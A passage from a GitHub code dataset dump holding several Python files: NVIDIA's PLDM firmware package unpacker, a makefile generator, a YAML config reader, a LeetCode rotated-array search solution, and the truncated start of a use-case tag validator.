b'\\xf0\\x18\\x87\\x8c\\xcb\\x7d\\x49\\x43\\x98\\x00\\xa0\\x2f\\x05\\x9a\\xca\\x02'\n uuid_v1_0 = str(uuid.UUID(bytes=pldm_fw_header_id_v1_0))\n self.header_map[\"PackageHeaderIdentifier\"] = str(\n uuid.UUID(bytes=self.fwpkg_fd.read(16)))\n if uuid_v1_0 != self.header_map[\"PackageHeaderIdentifier\"]:\n log_msg = \"Expected PLDM v1.0 but PackageHeaderIdentifier is \"\\\n + self.header_map[\"PackageHeaderIdentifier\"]\n Util.cli_log(log_msg, False)\n return False\n self.header_map[\"PackageHeaderFormatRevision\"] = str(\n int.from_bytes(self.fwpkg_fd.read(1),\n byteorder='little',\n signed=False))\n self.header_map[\"PackageHeaderSize\"] = int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n timestamp = self.fwpkg_fd.read(13)\n self.header_map[\"PackageReleaseDateTime\"] = Util.get_timestamp_str(\n timestamp)\n self.header_map[\"ComponentBitmapBitLength\"] = int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n self.header_map[\"PackageVersionStringType\"] = int.from_bytes(\n self.fwpkg_fd.read(1), byteorder='little', signed=False)\n version_str_len = int.from_bytes(self.fwpkg_fd.read(1),\n byteorder='little',\n signed=False)\n self.header_map[\"PackageVersionStringLength\"] = version_str_len\n self.header_map[\"PackageVersionString\"] = self.fwpkg_fd.read(\n version_str_len).decode('utf-8')\n self.full_header[\"PackageHeaderInformation\"] = self.header_map\n return True\n\n def parse_device_id_records(self):\n \"\"\"\n Parse PLDM FirmwareDeviceIDRecords data into self.fd_id_record_list\n Returns:\n True if parsing is successful\n \"\"\"\n # pylint: disable=line-too-long\n self.device_id_record_count = int.from_bytes(self.fwpkg_fd.read(1),\n byteorder='little',\n signed=False)\n for _ in range(self.device_id_record_count):\n id_record_map = {}\n id_record_map[\"RecordLength\"] = int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n id_record_map[\"DescriptorCount\"] = int.from_bytes(\n self.fwpkg_fd.read(1), byteorder='little', signed=False)\n id_record_map[\"DeviceUpdateOptionFlags\"] = int.from_bytes(\n self.fwpkg_fd.read(4), byteorder='little', signed=False)\n id_record_map[\n \"ComponentImageSetVersionStringType\"] = int.from_bytes(\n self.fwpkg_fd.read(1), byteorder='little', signed=False)\n id_record_map[\n \"ComponentImageSetVersionStringLength\"] = int.from_bytes(\n self.fwpkg_fd.read(1), byteorder='little', signed=False)\n id_record_map[\"FirmwareDevicePackageDataLength\"] = int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n applicable_component_size = math.ceil(\n self.header_map[\"ComponentBitmapBitLength\"] / 8)\n id_record_map[\"ApplicableComponents\"] = int.from_bytes(\n self.fwpkg_fd.read(applicable_component_size),\n byteorder='little',\n signed=False)\n id_record_map[\n \"ComponentImageSetVersionString\"] = self.fwpkg_fd.read(\n id_record_map[\"ComponentImageSetVersionStringLength\"]\n ).decode('utf-8')\n descriptors = []\n for j in range(id_record_map[\"DescriptorCount\"]):\n descriptor_map = {}\n if j == 0:\n descriptor_map[\"InitialDescriptorType\"] = int.from_bytes(\n self.fwpkg_fd.read(2),\n byteorder='little',\n signed=False)\n descriptor_map[\"InitialDescriptorLength\"] = int.from_bytes(\n self.fwpkg_fd.read(2),\n byteorder='little',\n signed=False)\n value = self.fwpkg_fd.read(\n descriptor_map[\"InitialDescriptorLength\"])\n descriptor_map[\"InitialDescriptorData\"] = value\n\n else:\n descriptor_map[\n \"AdditionalDescriptorType\"] = int.from_bytes(\n self.fwpkg_fd.read(2),\n byteorder='little',\n signed=False)\n descriptor_map[\n \"AdditionalDescriptorLength\"] = int.from_bytes(\n self.fwpkg_fd.read(2),\n byteorder='little',\n signed=False)\n if descriptor_map[\"AdditionalDescriptorType\"] == 0xFFFF:\n descriptor_map[\n \"VendorDefinedDescriptorTitleStringType\"] = int.from_bytes(\n self.fwpkg_fd.read(1),\n byteorder='little',\n signed=False)\n descriptor_map[\n \"VendorDefinedDescriptorTitleStringLength\"] = int.from_bytes(\n self.fwpkg_fd.read(1),\n byteorder='little',\n signed=False)\n descriptor_map[\n \"VendorDefinedDescriptorTitleString\"] = self.fwpkg_fd.read(\n descriptor_map[\n \"VendorDefinedDescriptorTitleStringLength\"]\n ).decode('utf-8')\n vendor_def_data_len = (\n descriptor_map[\"AdditionalDescriptorLength\"] -\n (2 + descriptor_map[\n \"VendorDefinedDescriptorTitleStringLength\"]))\n descriptor_map[\n \"VendorDefinedDescriptorData\"] = self.fwpkg_fd.read(\n vendor_def_data_len).hex()\n else:\n descriptor_map[\n \"AdditionalDescriptorIdentifierData\"] = self.fwpkg_fd.read(\n descriptor_map[\"AdditionalDescriptorLength\"])\n descriptors.append(descriptor_map)\n id_record_map[\"RecordDescriptors\"] = descriptors\n id_record_map[\"FirmwareDevicePackageData\"] = self.fwpkg_fd.read(\n id_record_map[\"FirmwareDevicePackageDataLength\"]).decode(\n 'utf-8')\n self.fd_id_record_list.append(id_record_map)\n self.full_header[\"FirmwareDeviceIdentificationArea\"] = {\n \"DeviceIDRecordCount\": self.device_id_record_count,\n \"FirmwareDeviceIDRecords\": self.fd_id_record_list\n }\n return True\n\n def parse_component_img_info(self):\n \"\"\"\n Parse PLDM Component Image info data into self.fd_id_record_list\n Returns :\n True if parsing successful\n \"\"\"\n component_image_count = int.from_bytes(self.fwpkg_fd.read(2),\n byteorder='little',\n signed=False)\n for _ in range(component_image_count):\n comp_info = {}\n comp_info[\"ComponentClassification\"] = int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n comp_info[\"ComponentIdentifier\"] = hex(\n int.from_bytes(self.fwpkg_fd.read(2),\n byteorder='little',\n signed=False))\n comp_info[\"ComponentComparisonStamp\"] = int.from_bytes(\n self.fwpkg_fd.read(4), byteorder='little', signed=False)\n comp_info[\"ComponentOptions\"] = int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n comp_info[\"RequestedComponentActivationMethod\"] = int.from_bytes(\n self.fwpkg_fd.read(2), byteorder='little', signed=False)\n # RequestedComponentActivationMethod can have any combination of bits 0:5 set\n # Any value above 0x3F is invalid\n activation_val = comp_info[\"RequestedComponentActivationMethod\"]\n if activation_val > 0x3F:\n Util.cli_log(\n f\"Found invalid value for RequestedComponentActivationMethod={activation_val}\",\n True)\n comp_info[\"ComponentLocationOffset\"] = int.from_bytes(\n self.fwpkg_fd.read(4), byteorder='little', signed=False)\n comp_info[\"ComponentSize\"] = int.from_bytes(self.fwpkg_fd.read(4),\n byteorder='little',\n signed=False)\n comp_info[\"ComponentVersionStringType\"] = int.from_bytes(\n self.fwpkg_fd.read(1), byteorder='little', signed=False)\n comp_info[\"ComponentVersionStringLength\"] = int.from_bytes(\n self.fwpkg_fd.read(1), byteorder='little', signed=False)\n comp_info[\"ComponentVersionString\"] = self.fwpkg_fd.read(\n comp_info[\"ComponentVersionStringLength\"]).decode('utf-8')\n self.component_img_info_list.append(comp_info)\n self.full_header[\"ComponentImageInformationArea\"] = {\n \"ComponentImageCount\": component_image_count,\n \"ComponentImageInformation\": self.component_img_info_list\n }\n return True\n\n def get_image_name_from_records(self, comp_info_index):\n \"\"\"\n Identify records which which contain metadata for image at\n index comp_info_index component image info list\n Parameter:\n comp_info_index index of image in component image\n info section\n Returns:\n Name of the applicable record for given image\n or \"\" if nothing found\n \"\"\"\n mask = 1 << comp_info_index\n for rec in self.fd_id_record_list:\n applicable_comp_indices = rec[\"ApplicableComponents\"]\n name = rec[\"ComponentImageSetVersionString\"]\n if mask & applicable_comp_indices == mask:\n if name.find(\",\") == -1:\n return name, rec['RecordDescriptors']\n components = name.split(\",\")\n applicable_comp = applicable_comp_indices\n count = 0\n for _ in range(comp_info_index + 1):\n if applicable_comp & 1 == 1:\n count = count + 1\n applicable_comp = applicable_comp >> 1\n return components[count - 1], rec['RecordDescriptors']\n return \"\", None\n\n def get_image_name(self, comp_info_index):\n \"\"\"\n Create the image name string by appending various metadata\n separated by '_'\n Parameter:\n comp_info_index index of image in component image\n for naming\n Returns:\n Name of the image for unpacking\n or \"\"\n \"\"\"\n comp_info = self.component_img_info_list[comp_info_index]\n name, _ = self.get_image_name_from_records(comp_info_index)\n if name != \"\":\n name = name.replace(\":\", \"_\")\n name = name.replace(\"_N/A\", \"\")\n name = name + \"_\" + comp_info[\"ComponentVersionString\"]\n if name.startswith(\"FW-Package\"):\n name = name + \".fwpkg\"\n else:\n name = name + \"_image.bin\"\n name = re.sub(\"_+\", \"_\", name)\n return name\n\n def create_unpacked_files(self, output_dir):\n \"\"\"\n Extract each firmware image from the\n Firmware Package Payload section of the input file.\n Parameter:\n output_dir path of the directory to store the\n extracted files\n Returns:\n True if unpacking was successful\n \"\"\"\n package_size = os.path.getsize(self.package)\n for index, info in enumerate(self.component_img_info_list):\n offset = info[\"ComponentLocationOffset\"]\n size = info[\"ComponentSize\"]\n if offset + size > package_size:\n log_msg = f\"Error: ComponentLocationOffset {offset} + \\\n ComponentSize {size} exceeds given package size {package_size}\"\n\n Util.cli_log(log_msg, False)\n return False\n img_name = output_dir + self.get_image_name(index)\n if img_name == \"\":\n log_msg = \"Error: The input firmware package does not conform to \\\n the format created by NVIDIA packaging tool.\"\n\n Util.cli_log(log_msg, False)\n return False\n try:\n if os.path.exists(img_name):\n os.remove(img_name)\n with open(img_name, \"w+b\") as component_img_fd:\n self.fwpkg_fd.seek(offset, 0)\n bytes_left = size\n buffer_size = 2048\n while bytes_left > 0:\n if bytes_left < 2048:\n buffer_size = bytes_left\n buffer = self.fwpkg_fd.read(buffer_size)\n component_img_fd.write(buffer)\n bytes_left = bytes_left - buffer_size\n info[\"FWImageName\"] = img_name\n if os.path.exists(img_name):\n os.chmod(img_name,\n stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)\n except OSError as err:\n log_msg = f\"Error: Could not create file {img_name} due to {err}\"\n Util.cli_log(log_msg, False)\n return False\n return True\n\n def get_pldm_header_checksum(self):\n \"\"\" Read PLDM header checksum \"\"\"\n self.full_header['Package Header Checksum'] = int.from_bytes(\n self.fwpkg_fd.read(4), byteorder='little', signed=False)\n\n def unpack_pldm_package(self, package_name, output_dir):\n \"\"\"\n Parse the PLDM package and get information about components included in the FW image.\n Unpack the package if required.\n Parameters:\n package_name filepath of input package file\n output_dir directory to store the resulting unpacked files\n Returns:\n True if parsing and unpacking was successful\n \"\"\"\n if package_name == \"\" or package_name is None:\n log_msg = \"ERROR: Firmware package file is mandatory.\"\n Util.cli_log(log_msg, False)\n return False\n if os.path.exists(package_name) is False:\n log_msg = print(\"ERROR: File does not exist at path \",\n package_name)\n Util.cli_log(log_msg, False)\n return False\n self.package = package_name\n try:\n with open(self.package, \"rb\") as self.fwpkg_fd:\n parsing_valid = self.parse_header()\n if parsing_valid:\n parsing_valid = self.parse_device_id_records()\n if parsing_valid:\n parsing_valid = self.parse_component_img_info()\n self.get_pldm_header_checksum()\n if parsing_valid and self.unpack:\n if output_dir == \"\" or output_dir is None:\n # If outdir was not given in command\n # assume current directory\n output_dir = \".\"\n output_dir = os.path.abspath(output_dir) + \"/\"\n # If dir doesn't exist, create it\n if os.path.isdir(output_dir) is False:\n os.makedirs(output_dir)\n parsing_valid = self.create_unpacked_files(output_dir)\n if self.verbose:\n log_message = f\"PLDM Output directory: {output_dir}, \\\n Package name: {package_name}\"\n\n Util.cli_log(log_message, True)\n if parsing_valid is False:\n log_message = \"Package Header Contents:\\\n \" + str(self.header_map)\n Util.cli_log(log_message, True)\n log_message = \"FirmwareDeviceIDRecords Contents:\\\n \" + str(self.fd_id_record_list)\n Util.cli_log(log_message, True)\n log_message = \"ComponentImageInformation Contents:\\\n \" + str(self.component_img_info_list)\n Util.cli_log(log_message, True)\n return parsing_valid\n except IOError as e_io_error:\n log_message = f\"Couldn't open or read given FW package ({e_io_error})\"\n Util.cli_log(log_message, False)\n return False\n\n def get_applicable_component_index(self, applicable_component):\n \"\"\"\n Return list of indices of applicable component images from\n applicable_component index bitmap.\n \"\"\"\n # number of images in the image section\n max_bits = len(self.component_img_info_list)\n indices = []\n for shift in range(max_bits):\n # for each index check if the bit at that position is set in applicable_component\n mask = 1 << shift\n result = applicable_component & mask\n if result == mask:\n indices.append(shift)\n return indices\n\n def get_signature_type(self, fw_image, component_identifier):\n \"\"\" Method to tell if unpacked bin is prod signed or debug signed \"\"\"\n return 'N/A'\n \n @staticmethod\n def is_glacier_device(record, device_name):\n \"\"\"\n Is this device a glacer device\n \"\"\"\n if device_name.startswith(\"ERoT\"):\n return True\n if record[\"DescriptorCount\"] == 0:\n return False\n record_desc = record[\"RecordDescriptors\"]\n for desc in record_desc:\n descriptor_type = desc.get(\"AdditionalDescriptorType\", \"\")\n if descriptor_type == 65535:\n title = desc.get(\"VendorDefinedDescriptorTitleString\", \"\")\n if title == \"GLACIERDSD\":\n return True\n return False\n\n def get_applicable_components_names(self, record):\n # pylint: disable=too-many-branches\n \"\"\"\n Method to create list of applicable component images and their metadata like\n ComponentIdentifier and Version. FWImage is included if unpacking was done.\n Also prepares ComponentImageSetVersionString in name:model:vendor,... format if\n it is not already so.\n \"\"\"\n index = self.get_applicable_component_index(\n record[\"ApplicableComponents\"])\n components = []\n device_name = record[\"ComponentImageSetVersionString\"]\n for i in index:\n component = {}\n img = self.component_img_info_list[i]\n if self.unpack is True:\n component = {\n \"ComponentIdentifier\": \"\",\n \"ComponentVersionString\": \"\",\n \"FWImage\": \"\"\n }\n component[\"FWImage\"] = img[\"FWImageName\"]\n component[\n \"FWImageSHA256\"] = Util.get_checksum_for_component_image(\n component[\"FWImage\"])\n # For ERoT associated devices get signature type\n if self.is_glacier_device(\n record, component[\"FWImage\"].rsplit('/', 1)[-1]):\n signature_type = self.get_signature_type(\n component[\"FWImage\"], img[\"ComponentIdentifier\"])\n if signature_type:\n component[\"SignatureType\"] = signature_type\n else:\n component[\"SignatureType\"] = \"N/A\"\n component[\"FWImageSize\"] = img[\"ComponentSize\"]\n else:\n component = {\n \"ComponentIdentifier\": \"\",\n \"ComponentVersionString\": \"\"\n }\n component[\"ComponentIdentifier\"] = img[\"ComponentIdentifier\"]\n component[\"ComponentVersionString\"] = img[\"ComponentVersionString\"]\n components.append(component)\n if not self.unpack:\n ap_sku, ec_sku = 'N/A', 'N/A'\n records = record[\"RecordDescriptors\"]\n for i in range(1, len(records)):\n if records[i][\"AdditionalDescriptorType\"] == 65535:\n if records[i][\n \"VendorDefinedDescriptorTitleString\"] == \"APSKU\":\n ap_sku = \"0x\" + records[i][\n \"VendorDefinedDescriptorData\"]\n elif records[i][\n \"VendorDefinedDescriptorTitleString\"] == \"ECSKU\":\n ec_sku = \"0x\" + records[i][\n \"VendorDefinedDescriptorData\"]\n\n for component in components:\n if component.get(\"ComponentIdentifier\") == \"0xff00\":\n component[\"ECSKUID\"] = ec_sku\n else:\n component[\"APSKUID\"] = ap_sku\n return components, device_name\n\n def decode_descriptor_data(self, desc_type_name, desc_data):\n \"\"\" Formatting for descriptor data based on endianess\"\"\"\n desc_val = \"\"\n if desc_type_name in self.little_endian_list:\n desc_val = Util.get_padded_hex(desc_data)\n else:\n desc_val = \"0x\" + desc_data.hex()\n return desc_val\n\n def get_formatted_descriptors(self, record_desc, components):\n \"\"\"\n Method to prepare stripped and formatted descriptor section for json output.\n \"\"\"\n records = record_desc[\"RecordDescriptors\"]\n descriptors = []\n desc = {}\n if len(records) == 0:\n return descriptors\n desc[\"InitialDescriptorType\"] = Util.get_descriptor_type_name(\n records[0][\"InitialDescriptorType\"])\n desc[\"InitialDescriptorData\"] = self.decode_descriptor_data(\n desc[\"InitialDescriptorType\"], records[0][\"InitialDescriptorData\"])\n descriptors.append(desc)\n for i in range(1, len(records)):\n desc = {}\n desc[\"AdditionalDescriptorType\"] = Util.get_descriptor_type_name(\n records[i][\"AdditionalDescriptorType\"])\n if records[i][\"AdditionalDescriptorType\"] == 65535:\n desc[\"VendorDefinedDescriptorTitleString\"] = records[i][\n \"VendorDefinedDescriptorTitleString\"]\n desc_data = records[i][\"VendorDefinedDescriptorData\"]\n desc[\"VendorDefinedDescriptorData\"] = '0x' + str(desc_data)\n if desc[\"VendorDefinedDescriptorTitleString\"] == \"APSKU\":\n # AP SKU on Retimer is just vendor id, not a real AP SKU ID. So skip\n if \"FWImage\" in components[-1] and \\\n not \"PCIeRetimer\" in components[-1][\"FWImage\"]:\n bin_ary = bytearray.fromhex(\n desc_data[:-2]) # First byte is strap id\n bin_ary.reverse()\n ap_sku_id = ''.join(format(x, '02x') for x in bin_ary)\n components[-1][\"AP_SKU_ID\"] = \"0x\" + ap_sku_id\n desc[\"VendorDefinedDescriptorData\"] = components[-1][\n \"AP_SKU_ID\"]\n else:\n desc[\"AdditionalDescriptorData\"] = self.decode_descriptor_data(\n desc[\"AdditionalDescriptorType\"],\n records[i][\"AdditionalDescriptorIdentifierData\"])\n descriptors.append(desc)\n return descriptors\n\n def get_full_metadata_json(self):\n \"\"\" Decode byte value descriptors for full package metadata command \"\"\"\n for device_records in self.full_header[\n 'FirmwareDeviceIdentificationArea']['FirmwareDeviceIDRecords']:\n device_records[\n 'ApplicableComponents'] = self.get_applicable_component_index(\n device_records['ApplicableComponents'])\n records = device_records[\"RecordDescriptors\"]\n descriptors = []\n if len(records) == 0:\n continue\n desc = records[0]\n desc[\"InitialDescriptorType\"] = Util.get_descriptor_type_name(\n records[0][\"InitialDescriptorType\"])\n desc[\"InitialDescriptorData\"] = self.decode_descriptor_data(\n desc[\"InitialDescriptorType\"], desc[\"InitialDescriptorData\"])\n descriptors.append(desc)\n for i in range(1, len(records)):\n desc = records[i]\n desc[\n \"AdditionalDescriptorType\"] = Util.get_descriptor_type_name(\n records[i][\"AdditionalDescriptorType\"])\n if desc[\"AdditionalDescriptorType\"] == 'Vendor Defined':\n desc[\"VendorDefinedDescriptorTitleString\"] = records[i][\n \"VendorDefinedDescriptorTitleString\"]\n desc_data = records[i][\"VendorDefinedDescriptorData\"]\n desc[\"VendorDefinedDescriptorData\"] = '0x' + str(desc_data)\n else:\n desc[\n \"AdditionalDescriptorIdentifierData\"] = self.decode_descriptor_data(\n desc[\"AdditionalDescriptorType\"],\n desc[\"AdditionalDescriptorIdentifierData\"])\n descriptors.append(desc)\n device_records[\"RecordDescriptors\"] = descriptors\n\n def prepare_records_json(self):\n # pylint: disable=line-too-long\n \"\"\"\n Prepares the JSON output for the tool.\n \"\"\"\n package_json = {\n \"PackageHeaderInformation\": {},\n \"FirmwareDeviceRecords\": []\n }\n package_json[\"PackageHeaderInformation\"][\"PackageHeaderIdentifier\"] = (\n self.header_map[\"PackageHeaderIdentifier\"])\n package_json[\"PackageHeaderInformation\"][\n \"PackageHeaderFormatRevision\"] = (\n self.header_map[\"PackageHeaderFormatRevision\"])\n if package_json[\"PackageHeaderInformation\"][\n \"PackageHeaderFormatRevision\"] != \"1\":\n return False, \"The input firmware package version does not conform \\\n to the format created by NVIDIA packaging tool.\"\n\n package_json[\"PackageHeaderInformation\"][\"PackageReleaseDateTime\"] = (\n self.header_map[\"PackageReleaseDateTime\"])\n package_json[\"PackageHeaderInformation\"][\"PackageVersionString\"] = (\n self.header_map[\"PackageVersionString\"])\n package_json['PackageHeaderInformation'][\"PackageSHA256\"] = (\n Util.get_checksum_for_component_image(self.package))\n recordlist = []\n for record in self.fd_id_record_list:\n rec = {\n \"ComponentImageSetVersionString\": \"\",\n \"DeviceDescriptors\": [],\n \"Components\": []\n }\n components, name = self.get_applicable_components_names(record)\n if not components or not name:\n return False, \"The input firmware package does not conform to \\\n the format created by NVIDIA packaging tool.\"\n\n rec[\"DeviceDescriptors\"] = self.get_formatted_descriptors(\n record, components)\n rec[\"Components\"] = components\n rec[\"ComponentImageSetVersionString\"] = name\n recordlist.append(rec)\n package_json[\"FirmwareDeviceRecords\"] = recordlist\n json_string = json.dumps(package_json, indent=4)\n return True, json_string\n\n\ndef main():\n \"\"\"\n Call upack parser and prepare output json\n \"\"\"\n arg_parser = argparse.ArgumentParser(prog='fwpkg-unpack',\n description=\"\\\n NVIDIA fwpkg-unpack v{UNPACK_TOOL_VERSION} The firmware package unpack tool performs parsing of\\\n the firmware package and unpacking. The unpacker will extract all firmware\\\n images from the package and create bin files for each.\",\n allow_abbrev=False)\n arg_parser.add_argument(\n \"file\", help=\"Provide firmware package filename to unpack.\", nargs='?')\n arg_group = arg_parser.add_mutually_exclusive_group(required=True)\n arg_group.add_argument(\n \"--unpack\",\n action='store_true',\n help=\"Unpack the firmware package and extract all component images.\")\n arg_group.add_argument(\n \"--show_pkg_content\",\n action='store_true',\n help=\n \"Provide package content description without extracting firmware images.\"\n )\n arg_group.add_argument(\n \"--show_all_metadata\",\n action='store_true',\n help=\n \"Provide all PLDM metadata in package without extracting firmware images.\"\n )\n arg_parser.add_argument(\n \"--outdir\",\n help=\n \"Provide path to the directory where unpacked FW files will be stored. \\\n This option is used along with --unpack. \\\n If this option not specified with --unpack, current directory is assumed as outdir. \\\n Creates the directory at a given path if it does not exist.\")\n arg_group.add_argument(\"--version\",\n action='store_true',\n help=\"Show tool version.\")\n arg_parser.add_argument(\n \"--verbose\",\n action='store_true',\n help=\n \"Verbose Mode, This option is used along with --unpack or --show_pkg_content. \\\n By using this command, debug prints from the code will be copied in a debug \\\n logfile created in the same directory with name fwpkg_unpack_log.txt from\\\n unpack tool.\")\n tool_args = arg_parser.parse_args()\n\n pldm_parser = PLDMUnpack()\n pldm_parser.unpack = tool_args.unpack\n\n if tool_args.show_pkg_content is True:\n pldm_parser.unpack = False\n\n if tool_args.version is True:\n print(f\"NVIDIA fwpkg-unpack - version {UNPACK_TOOL_VERSION}\")\n sys.exit(0)\n else:\n parser_status = pldm_parser.unpack_pldm_package(\n tool_args.file, tool_args.outdir)\n if parser_status is True:\n json_output = {}\n if tool_args.show_all_metadata is False:\n parser_status, json_output = pldm_parser.prepare_records_json()\n if not parser_status:\n print(\"Status : Failed to prepare JSON records\")\n print(\"Path for LogFile \", Util.LOGFILE_PATH)\n else:\n pldm_parser.get_full_metadata_json()\n json_output = json.dumps(pldm_parser.full_header,\n sort_keys=False,\n indent=4)\n print(json_output)\n sys.exit(0)\n else:\n print(\"Status : Failed\")\n print(\"Path for LogFile \", Util.LOGFILE_PATH)\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NVIDIA/PLDM-unpack","sub_path":"fwpkg_unpack.py","file_name":"fwpkg_unpack.py","file_ext":"py","file_size_in_byte":38661,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26174591710","text":"#!/usr/bin/env python3\n\n# this script analyzes all the source files and extracts any header dependencies it uses.\n# it then constructs a makefile for automated building with partial compilation.\n# the output makefile is additionally optimized for parallel compilation.\n\nimport os, shutil, re\n\n# --------------------------------------\n\n# name of the output makefile\nout_name = \"makefile\"\n\n# name of the exe file to produce (as a result of running the generated makefile)\nexe_name = \"csx.exe\"\n\n# the list of source directories - their contents are searched for .cpp files\nsource_dirs = [ \"./\", \"src/\" ]\n\n# the directory to place object files in\nobjdir = \"obj/\"\n\nbuild_info = [\n type(\"obj\", (object,), x) for x in [\n { \"name\" : \"release\", \"compile\" : \"g++ -O4 -Wall -Wextra -Wpedantic -Wshadow -std=c++17 -c {}\", \"link\" : \"g++ {} -lstdc++fs\" },\n { \"name\" : \"debug\", \"compile\" : \"g++ -Og -Wall -Wextra -Wpedantic -Wshadow -std=c++17 -c {} -Wno-maybe-uninitialized\", \"link\" : \"g++ {} -lstdc++fs\" },\n { \"name\" : \"release-san\", \"compile\" : \"clang++ -O3 -Wall -Wextra -Wpedantic -Wshadow -std=c++17 -fsanitize=undefined -fsanitize=address -c {}\", \"link\" : \"clang++ -fsanitize=undefined -fsanitize=address {} -lstdc++fs\" },\n { \"name\" : \"debug-san\", \"compile\" : \"clang++ -Og -Wall -Wextra -Wpedantic -Wshadow -std=c++17 -fsanitize=undefined -fsanitize=address -c {}\", \"link\" : \"clang++ -fsanitize=undefined -fsanitize=address {} -lstdc++fs\" },\n ]\n]\n\n# --------------------------------------\n\nsource = []\nfor dir in source_dirs:\n for name in os.listdir(dir):\n if name.endswith(\".cpp\"):\n dep = []\n with open(dir + name, \"r\") as file:\n for line in file:\n match = re.fullmatch(\"\\\\s*#include \\\"(.*)\\\"\\\\s*\", line)\n if match: dep.append(match.groups()[0])\n source.append(type(\"obj\", (object,), { \"name\" : name, \"dir\" : dir, \"dep\" : dep, \"size\" : os.path.getsize(dir + name) }))\n\nsource.sort(key=lambda s: s.size, reverse=True)\n\nprint(\"Parsed Dependencies:\\n\")\nfor s in source:\n print(f\"{s.dir + s.name} ({s.size}):\")\n for d in s.dep: print(f\"\\t{s.dir + d}\")\n print()\n\n# --------------------------------------\n\nif os.path.exists(objdir): shutil.rmtree(objdir)\n\nwith open(out_name, \"w\") as out:\n objsets = []\n\n for build in build_info:\n os.makedirs(objdir + build.name)\n\n objs = \"\"\n for s in source: objs += f\" {objdir + build.name}/{s.name[:-4]}.o\"\n objsets.append(objs)\n\n out.write(f\"{build.name}:{objs}\\n\\t{build.link.format(objs)} -o {exe_name}\\n\\n\")\n\n for s in source:\n dep = \"\"\n for d in s.dep: dep += \" {}\".format(s.dir + d)\n obj_path = f\"{objdir + build.name}/{s.name[:-4]}.o\"\n out.write(f\"{obj_path}:{dep}\\n\\t{build.compile.format(s.dir + s.name)} -o {obj_path}\\n\\n\")\n \n clean_cmd = f\"clean:\\n\\trm -f {exe_name}\"\n for set in objsets: clean_cmd += f\"\\n\\trm -f {set}\"\n out.write(clean_cmd + \"\\n\\n\")\n","repo_name":"dragazo/CSX64-cpp","sub_path":"makemake.py","file_name":"makemake.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3832767075","text":"import json\nimport os\n\nimport yaml\nimport argparse\n\ndef load_datacollection_config(path):\n datacollection_config_path = path\n with open(datacollection_config_path) as f:\n contents = f.read()\n config = yaml.load(contents)\n\n return config\n\ndef get_args():\n parser = argparse.ArgumentParser(description='Read data collection policy config to do tests')\n parser.add_argument('path', type=str)\n return vars(parser.parse_args())\n\ndef main():\n args = get_args()\n config = load_datacollection_config(args['path'])\n pick_models = list(config['models']['pick_models'].keys())\n print(pick_models)\n\n calibration = config['cached_calibrations']\n print(type(calibration))\n\n print(config[\"tooltips\"][\"end_effectors\"])\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"geleazar1000111/ryu","sub_path":"Tests/Config_Read/read_config.py","file_name":"read_config.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28898550227","text":"# https://leetcode.com/problems/search-in-rotated-sorted-array/\n\n\n# Binary search, TC:O(logN), SC:O(1)\ndef search(nums, target):\n L, H = 0, len(nums)\n while L < H:\n M = (L+H) // 2\n if target < nums[0] < nums[M]: # -inf\n ## to the right\n L = M+1\n elif target >= nums[0] > nums[M]: # +inf\n ## to the left\n H = M\n elif nums[M] < target:\n ## to the right\n L = M+1\n elif nums[M] > target:\n ## to the left\n H = M\n else:\n return M\n return -1\n\n# Binary search, TC:O(logN), SC:O(1)\ndef search2(nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: int\n \"\"\"\n left, right = 0, len(nums) - 1\n while left <= right:\n mid = (left + right) // 2\n # if found target value, return the index\n if nums[mid] == target:\n return mid\n\n # determine it's left rotated or right rotated\n \"\"\"\n No rotated:\n 1 2 3 4 5 6 7\n mid\n\n left rotated: pivot at the left side of the origin sorted array, A[mid] >= A[left]\n 3 4 5 6 7 1 2\n mid\n search in A[left] ~ A [mid] if A[left] <= target < A[mid] else, search right side\n\n right rotated: pivot at the right side of the origin sorted array, A[mid] < A[left]\n 6 7 1 2 3 4 5\n mid \n search in A[mid] ~ A[right] if A[mid] < target <= A[right] else, search left side\n \"\"\"\n if nums[mid] >= nums[left]: # left rotated\n # in ascending order side\n if nums[left] <= target <= nums[mid]:\n # if nums[L] == target, go left until L = R = 0\n right = mid - 1\n else:\n left = mid + 1\n else: # right rotated\n # in ascending order side\n if nums[mid] <= target <= nums[right]:\n # if nums[R]==target, go right until L = R = len(nums)-1\n left = mid + 1\n else:\n right = mid - 1\n # cannot find the target value\n return -1","repo_name":"ychanc2104/LeetCode","sub_path":"Search In Rotated Sorted Array.py","file_name":"Search In Rotated Sorted Array.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"12653559572","text":"\"\"\"Implementation of a function that verifies the\ninserted tags and validates the standard again in a certain way.\"\"\"\nfrom . import ok, nok\n\n\ndef __boolToString(b):\n \"\"\"Converts a boolean to a standard string\"\"\"\n return str(b).lower()\n\n\nBOOLEAN_STANDARD = [\"true\", \"false\"]\n\n\ndef checkTagsAndCompleteInfo(usecase, repoName, roleHttp, roleWS, internalAPIGW, customerAPIGW,\n customerAPIGWWS, externalResourcesAPIGW, stage, config, *nextArgs):\n \"\"\"Verify and complete the remaining tag information in the use case.\"\"\"\n tags = usecase[\"tags\"]\n for wayOfInvoke in [\"http\", \"ws\", \"queue\"]:\n tags[wayOfInvoke] = tags.get(wayOfInvoke, \"false\")\n assert tags[wayOfInvoke] in BOOLEAN_STANDARD, \\\n f\"{nok}{wayOfInvoke} is not among the standard values allowed for boolean values\"\n assert (int(tags[\"http\"] == \"true\") +\n int(tags[\"ws\"] == \"true\") + int(tags[\"queue\"] == \"true\") < 2), \\\n 